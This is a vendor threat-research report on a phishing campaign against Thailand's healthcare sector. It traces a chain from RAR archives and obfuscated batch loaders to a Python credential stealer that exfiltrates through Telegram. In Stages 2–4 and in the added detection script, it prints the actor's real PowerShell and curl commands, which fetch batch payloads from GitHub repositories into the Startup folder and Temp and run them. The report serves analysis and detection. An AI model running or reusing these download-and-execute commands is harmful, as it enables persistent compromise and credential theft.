Authors: Vaibhav Krushna Billade, Dixit Panchal & Rumana Siddiqui.
Table of Contents
- Introduction
- Key Targets
- Infection Chain
- Initial Campaign Findings
- Technical Analysis
- Stage 1: Initial Delivery (RAR Archive)
- Stage 2: Rouki-Obfuscated Batch Loader
- Stage 3: Startup Persistence Script
- Stage 4: Secondary Payload Execution
- Stage 5: Information Stealer Deployment (sim.py)
- Conclusion
- Seqrite Coverage
- Indicators of Compromise (IOCs)
- MITRE ATT&CK Mapping
Introduction
Seqrite Threat Research Unit (TRU) actively tracks and analyses threat actors and their campaigns, focusing on attribution, infrastructure analysis, and adversary tradecraft. Throughout our research, we have attributed numerous operations to China-aligned and other threat clusters targeting both regional and international entities.
During a recent investigation, we identified an active malware campaign targeting Thailand’s healthcare sector, including Ministry of Health personnel and affiliated healthcare organizations. The campaign leverages healthcare-themed spear-phishing lures distributed through malicious RAR archives containing obfuscated batch scripts and executable payloads. The infection chain employs multiple stages of obfuscation, GitHub-hosted payload delivery, persistence mechanisms, and information-stealing malware designed to establish a foothold within targeted environments while evading detection.
Key Targets
The campaign primarily targets personnel and departments across Thailand’s healthcare ecosystem, including:
- Ministry of Health personnel and government health procurement teams through lures impersonating official medical equipment approval documents.
- Hospital administration staff through fabricated patient admission request documents.
- Radiology and dental clinic staff through spoofed medical records and X-ray inquiry files.
- Clinical and radiological departments through fake patient CT scan result documents.
- Healthcare supply chain and medical equipment procurement teams through Ministry of Health-branded approval documents.
The lure themes suggest deliberate targeting of healthcare-related functions and demonstrate a strong understanding of operational workflows within the sector.
Infection Chain
RAR Archive → Obfuscated BAT Loader → Rouki-Obfuscated Payload Loader → Startup Persistence Script (WindowSecuryt.bat) → Secondary Batch Payload (u-t2.bat) → Python-Based Information Stealer (sim.py) → Telegram Exfiltration Attempts
Initial Campaign Findings
The earliest identified sample associated with the campaign was uploaded on April 7, 2026, while the most recent observed sample was uploaded on June 3, 2026, indicating an active operational window of roughly eight weeks at the time of analysis.
Key Observations
- All identified samples were uploaded from Thailand, suggesting the use of in-country staging infrastructure or compromised local systems for distribution.
- The threat actor distributes malware through RAR archives containing malicious batch scripts and executables disguised as healthcare- and government-related documents.
- Lure filenames are tailored to specific job functions, including administrative, clinical, radiology, and procurement personnel, indicating either prior reconnaissance of healthcare organizations or a broad targeting strategy informed by sector-specific knowledge.
- All observed samples utilize a consistent RAR → BAT → Payload execution chain, suggesting a standardized toolset and repeatable delivery methodology.
Technical Analysis
Stage 1: Initial Delivery (RAR Archive)
The initial infection vector consists of a malicious RAR archive containing an obfuscated batch file that functions as the first-stage loader. Obfuscation is employed extensively to conceal functionality and hinder static analysis.
One observed sample, Health_Ministry_Approved_Equipment_2026.bat, creates a temporary file containing encoded payload data and leverages PowerShell to decode the embedded content. The decoded content is then written to a secondary batch file, which is subsequently executed.
Following execution, temporary artifacts are removed to reduce forensic evidence and complicate post-compromise investigations.
The use of embedded payload data, PowerShell-based decoding routines, and cleanup operations indicates a deliberate effort to conceal malicious functionality and evade security controls.
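Stage 1 describes the loader's behaviour (an encoded blob written to a temporary file, decoded by PowerShell into a second batch file, executed, then deleted) without showing its code. The following Python triage helper is an added example, not Seqrite's tooling and not the actor's loader: it pulls base64-looking runs out of a batch file, decodes them, and reports decoder hints, cleanup commands and whether the decoded content reads like a script. Base64 is an assumption, since the page does not name the encoding, and the sample loader embedded in the script is constructed for illustration.

```python
import base64
import re
from typing import Optional

# Added triage helper for batch loaders of the Stage 1 shape. Base64 is an
# ASSUMED encoding (the page does not name the scheme); the sample loader below
# is constructed for illustration and is not the campaign's file.

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DECODER_HINTS = ("FromBase64String", "-EncodedCommand", "-enc ", "certutil -decode")
SCRIPT_MARKERS = ("@echo", "powershell", "cmd /c", "cmd.exe", "call ", "start ", "curl ")
CLEANUP = re.compile(r"^\s*(?:del|erase|rd|rmdir)\b", re.I | re.M)


def _bytes_to_text(raw: bytes) -> Optional[str]:
    """UTF-8, or UTF-16LE when the bytes look like a -EncodedCommand payload."""
    enc = "utf-16-le" if raw.count(b"\x00") > len(raw) // 4 else "utf-8"
    try:
        return raw.decode(enc)
    except UnicodeDecodeError:
        return None


def decode_blob(blob: str) -> Optional[str]:
    """Decode one base64 run; keep it only if the result reads as text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    text = _bytes_to_text(raw)
    if not text:
        return None
    printable = sum(c.isprintable() or c in "\r\n\t" for c in text)
    return text if printable / len(text) >= 0.95 else None


def triage_loader(script: str) -> dict:
    """Report decoder usage, cleanup commands and any decodable embedded payloads."""
    lowered = script.lower()
    payloads = []
    for m in B64_RUN.finditer(script):
        text = decode_blob(m.group(0))
        if text is None:
            continue
        markers = [k.strip() for k in SCRIPT_MARKERS if k in text.lower()]
        payloads.append({"offset": m.start(), "length": len(m.group(0)),
                         "markers": markers, "text": text})
    return {
        "decoder_hints": [h.strip() for h in DECODER_HINTS if h.lower() in lowered],
        "cleanup": bool(CLEANUP.search(script)),
        "payloads": payloads,
    }


# Constructed sample: a stage-2 batch body, base64-encoded into a temp file,
# decoded by PowerShell into payload.bat, executed, then the temp file deleted.
INNER_PAYLOAD = '@echo off\r\npowershell.exe -WindowStyle Hidden -Command "Write-Host stage2"\r\n'
ENCODED = base64.b64encode(INNER_PAYLOAD.encode()).decode()
SAMPLE_LOADER = (
    '@echo off\r\n'
    'set "t=%TEMP%\\p.tmp"\r\n'
    f'echo {ENCODED}>"%t%"\r\n'
    "powershell -Command \"[IO.File]::WriteAllText('%TEMP%\\payload.bat', "
    "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Get-Content '%t%'))))\"\r\n"
    'call "%TEMP%\\payload.bat"\r\n'
    'del "%t%"\r\n'
)

if __name__ == "__main__":
    report = triage_loader(SAMPLE_LOADER)
    print("decoder hints:", report["decoder_hints"], "cleanup:", report["cleanup"])
    for p in report["payloads"]:
        print(f"blob@{p['offset']} ({p['length']} chars) markers={p['markers']}")
        print(p["text"])
```

The printable-ratio check is what keeps hashes and other long alphanumeric runs out of the payload list: they decode, but to binary. Real loaders may chain several encodings or split the blob across lines; a run that decodes to text containing another base64 run is a reason to feed the output back through triage_loader.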
Stage 2: Rouki-Obfuscated Batch Loader
The decoded payload.bat executed during Stage 1 was heavily obfuscated using a framework identified as Rouki.
Analysis revealed that the script dynamically reconstructs and executes PowerShell commands that download, persist, and execute additional malware components. The use of GitHub-hosted payloads, deceptive file extensions, and multi-stage execution provides operational flexibility while reducing the likelihood of detection.
PowerShell Command 1 – Persistence Deployment
powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');"
This command downloads a file that is named as a PNG image on GitHub but is in fact a batch script, and stores it as WindowSecuryt.bat in the user's Startup folder. The .png name only affects the URL; the raw GitHub download returns the script bytes unchanged, so a check on the downloaded file's content rather than its name is what exposes the masquerade. The user profile in the destination path (C:\Users\admin) is the one recorded during analysis; detection logic should key on the Startup-folder path suffix and the .bat extension rather than on that username.
Placement in the Startup directory causes the script to run at every logon of that user, establishing persistence.
PowerShell Command 2 – Payload Deployment
powershell.exe -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip"
This command downloads a ZIP archive to C:\Users\Public, a directory writable by every local user, extracts it to C:\Users\Public\Desktops (one letter away from the legitimate Public Desktop folder), and runs the embedded Python-based payload (sim.py) with the Python interpreter shipped inside the archive.
After execution, the ZIP archive is deleted to minimize forensic artifacts and hinder incident response; the extracted directory, including the interpreter and sim.py, is left in place for later stages.
Stage 3: Startup Persistence Script (WindowSecuryt.bat)
Analysis of the downloaded WindowSecuryt.bat script revealed that it contains a significant amount of junk data and obfuscation logic similar to that observed in earlier-stage batch loaders. This non-functional content is intended to hinder static analysis and conceal the script’s true execution flow.
Upon execution, the script performs a privilege check and environment setup before reaching its final functional stage, where it reconstructs and executes the following command:
cmd /c "curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat"
This command uses curl to download an additional batch payload (u-t2.bat) from a GitHub-hosted repository and stores it in the user's temporary directory (%TEMP%, shown above as resolved for the analysis user admin). Writing to %TEMP% does not require elevated permissions.
After a successful download, the script immediately executes the payload with the call command, continuing the multi-stage infection chain.
Because the Startup-folder script runs at every user logon and fetches its payload from GitHub each time, the threat actor can replace u-t2.bat remotely and change the malware's behaviour on the next logon without touching the persistence mechanism on the host, giving flexible, long-term control over the infection chain.
Stage 4: Secondary Payload Execution (u-t2.bat)
Analysis of the downloaded u-t2.bat script revealed that it contains junk code and obfuscated sections similar to earlier batch components in the infection chain. These non-functional elements appear at the beginning of the script and are intended to hinder static analysis and conceal the actual execution flow. The meaningful logic is embedded deeper within these obfuscated segments and is resolved only during runtime execution.
The script attempts to relaunch itself with elevated privileges to gain higher-level access on the system.
Upon successful elevation, the script proceeds to execute the next-stage payload while minimizing user visibility.
The final stage of execution triggers the following payload:
powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py"
This command launches the previously deployed Python interpreter and executes sim.py while suppressing visible execution windows.
The use of a bundled Python runtime enables execution independent of any existing Python installation on the victim system and reduces deployment dependencies.
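Stages 2 to 4 share one set of observables: a PowerShell or curl download whose destination is the Startup folder or a Public/Temp directory, or whose extension does not match the URL's; a ZIP extracted under C:\Users\Public; the downloaded file called immediately after the download; and a Python interpreter launched from a non-standard path, often with a hidden window. The following Python detector is an added example, not Seqrite's detection content, that applies those rules to process command-line telemetry and adds a magic-byte check for the PNG/TXT masquerade. The four command lines are the ones quoted above (quotes normalised); the benign fifth line and the decoy bytes are constructed, and the rule names are this example's own.

```python
import re
from typing import List

# Added example: rules over process command-line telemetry for the download,
# staging and execution patterns quoted in Stages 2-4, plus a magic-byte check
# for the PNG/TXT masquerade. Rule names are this example's own.

STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
TEMP_OR_PUBLIC = re.compile(r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
DOWNLOADFILE = re.compile(r"""DownloadFile\(\s*['"]([^'"]+)['"]\s*,\s*['"]([^'"]+)['"]""", re.I)
CURL_OUT = re.compile(r"\bcurl(?:\.exe)?\s+(\S+)\s+-o\s+(\S+)", re.I)
INTERPRETER = re.compile(r"""(?:^|[\s"'])([A-Za-z]:\\[^\s"']*?\\python(?:\.exe)?)\s""", re.I)
DECOY_EXT = {".png", ".jpg", ".jpeg", ".gif", ".txt", ".pdf"}
SCRIPT_EXT = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".exe", ".zip"}
MAGIC = {".png": (b"\x89PNG\r\n\x1a\n",), ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
         ".gif": (b"GIF87a", b"GIF89a"), ".zip": (b"PK\x03\x04",), ".pdf": (b"%PDF-",)}


def _ext(path_or_url: str) -> str:
    """Lower-case extension of the last path component (query string stripped)."""
    name = re.split(r"[\\/]", path_or_url.split("?", 1)[0])[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def _downloads(cmd: str):
    """(url, destination) pairs from WebClient.DownloadFile(...) and curl ... -o ..."""
    return ([m.groups() for m in DOWNLOADFILE.finditer(cmd)]
            + [m.groups() for m in CURL_OUT.finditer(cmd)])


def classify(cmd: str) -> List[str]:
    """Return the rule names one process command line triggers, in rule order."""
    hits = []
    for url, dest in _downloads(cmd):
        if STARTUP_DIR.search(dest):
            hits.append("download_to_startup_folder")
        if _ext(url) in DECOY_EXT and _ext(dest) in SCRIPT_EXT:
            hits.append(f"extension_mismatch:{_ext(url)}->{_ext(dest)}")
        if TEMP_OR_PUBLIC.search(dest):
            hits.append("download_to_temp_or_public_dir")
        if re.search(r"&&\s*call\s+" + re.escape(dest), cmd, re.I):
            hits.append("download_then_execute")
    if re.search(r"ExtractToDirectory\(", cmd, re.I) and TEMP_OR_PUBLIC.search(cmd):
        hits.append("archive_extracted_to_public_dir")
    m = INTERPRETER.search(cmd)
    if m and TEMP_OR_PUBLIC.search(m.group(1)):
        hits.append("python_from_nonstandard_path")
    if hits and "-windowstyle hidden" in cmd.lower():
        hits.append("hidden_window")
    return hits


def scan(lines: List[str]) -> List[List[str]]:
    return [classify(line) for line in lines]


def content_matches_extension(name: str, data: bytes) -> bool:
    """False when a file named as an image/archive/PDF lacks that format's magic bytes."""
    expected = MAGIC.get(_ext(name))
    return True if expected is None else any(data.startswith(sig) for sig in expected)


# Lines 1-4 are the command lines quoted in Stages 2-4; line 5 is a constructed
# benign download for contrast.
SAMPLE_TELEMETRY = [
    r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');"''',
    r'''powershell.exe -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip"''',
    r'''cmd /c "curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat"''',
    r'''powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py"''',
    r'''powershell.exe -Command "Invoke-WebRequest -Uri https://intranet.example/forms/leave.pdf -OutFile C:\Users\somchai\Documents\leave.pdf"''',
]
# Constructed stand-in for the bytes served as up-t2.png: batch text, no PNG header.
DECOY_BYTES = b"@echo off\r\nrem constructed stand-in for a batch script served as up-t2.png\r\n"

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_TELEMETRY, scan(SAMPLE_TELEMETRY)):
        print(hits or "clean", "<-", line[:60])
    print("up-t2.png looks like a PNG:", content_matches_extension("up-t2.png", DECOY_BYTES))
```

The extension-mismatch and Startup-folder rules catch this chain whichever repository or filename the actor rotates to next, which is why they are preferred over matching the GitHub paths in the IOC list; the magic-byte check is the one to run on the downloaded artifact itself, since a proxy that only inspects the URL will see an image request.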
Stage 5: Information Stealer Deployment (sim.py)
The final payload identified during analysis is sim.py, a Python-based information stealer executed through the bundled Python environment.
Following execution, the malware terminates multiple web browsers, including Google Chrome, Microsoft Edge, Brave, and other Chromium-based browsers using taskkill commands. This behavior is commonly associated with information-stealing malware seeking access to browser databases, credential stores, cookies, and session artifacts that may otherwise be locked by active processes.
Observed Capabilities
- Collects browser-related data.
- Harvests stored credentials and session information.
- Stages collected data within temporary directories.
- Compresses harvested data into ZIP archives.
- Attempts exfiltration through Telegram-based infrastructure.
Execution logs revealed repeated attempts to transmit stolen data to attacker-controlled Telegram channels using hardcoded bot tokens and chat identifiers via the Telegram Bot API.
The exfiltration requests included victim-specific metadata such as:
- System identifiers
- Username information
- Harvested data counters
- Archive references
Although observed exfiltration attempts failed due to connectivity timeouts when communicating with api.telegram.org, the combination of browser data harvesting, local staging, archive creation, and attempted transmission confirms the payload’s information-stealing capabilities.
Overall, the malware exhibits characteristics commonly associated with modern Python-based stealers, including credential theft, session cookie harvesting, local data staging, archive generation, and Telegram-based exfiltration mechanisms.
The use of GitHub-hosted payload delivery, legitimate system utilities, layered obfuscation, and multi-stage execution contributes to both operational flexibility and defence evasion.
Conclusion
TRU assesses with moderate confidence that this campaign represents a targeted effort against Thailand’s healthcare sector, leveraging healthcare-themed social engineering lures, multi-stage batch loaders, GitHub-hosted payload infrastructure, and Python-based information-stealing malware.
The campaign demonstrates a repeatable delivery methodology consisting of RAR archives, heavily obfuscated batch scripts, persistence through Startup folder abuse, staged payload retrieval, and Telegram-based exfiltration attempts.
While no definitive attribution could be established based on the currently available evidence, the operational consistency observed across samples suggests the activity is being conducted by a single threat actor or closely related cluster. Continued monitoring of associated infrastructure, payload evolution, and victimology may provide additional insights into attribution and campaign objectives.
Organizations within the healthcare sector should remain vigilant against document-themed phishing campaigns, monitor for unauthorized Startup-folder modifications, and restrict the execution of untrusted scripts and binaries obtained from external sources.
Seqrite Coverage
- Script.Trojan.Downloader.50836.GC
- cld.script.trojan.1759432951
Indicators of Compromise (IOCs)
| File Name | SHA256 |
|---|---|
| Health_Ministry_Approved_Equipment_2026.rar | E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B |
| Health_Ministry_Approved_Equipment_2026.bat | 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0 |
| payload.bat | F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87 |
| WindowSecuryt.bat | 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183 |
| u-t2.bat | 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9 |
| Desktops.zip | 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80 |
| sim.py (information stealer) | 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865 |
MITRE ATT&CK Mapping
| Tactic | Technique Name | Technique ID |
|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Execution | Command and Scripting Interpreter: Python (bundled interpreter running sim.py) | T1059.006 |
| Execution | User Execution: Malicious File | T1204.002 |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 |
| Privilege Escalation | Abuse Elevation Control Mechanism | T1548 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Deobfuscate/Decode Files or Information (PowerShell decoding of the embedded payload) | T1140 |
| Defense Evasion | Masquerading: Masquerade File Type (BAT served as PNG/TXT) | T1036.008 |
| Defense Evasion | Hide Artifacts: Hidden Window (-WindowStyle Hidden) | T1564.003 |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 |
| Discovery | System Owner/User Discovery | T1033 |
| Credential Access | Credentials from Password Stores | T1555 |
| Credential Access | Credentials from Password Stores: Credentials from Web Browsers | T1555.003 |
| Collection | Data from Local System | T1005 |
| Collection | Archive Collected Data | T1560 |
| Command and Control | Ingress Tool Transfer (GitHub-hosted payloads) | T1105 |
| Command and Control | Application Layer Protocol: Web Protocols (HTTPS) | T1071.001 |
| Command and Control | Web Service (GitHub) | T1102 |
| Exfiltration | Exfiltration Over Web Service (Telegram Bot API) | T1567 |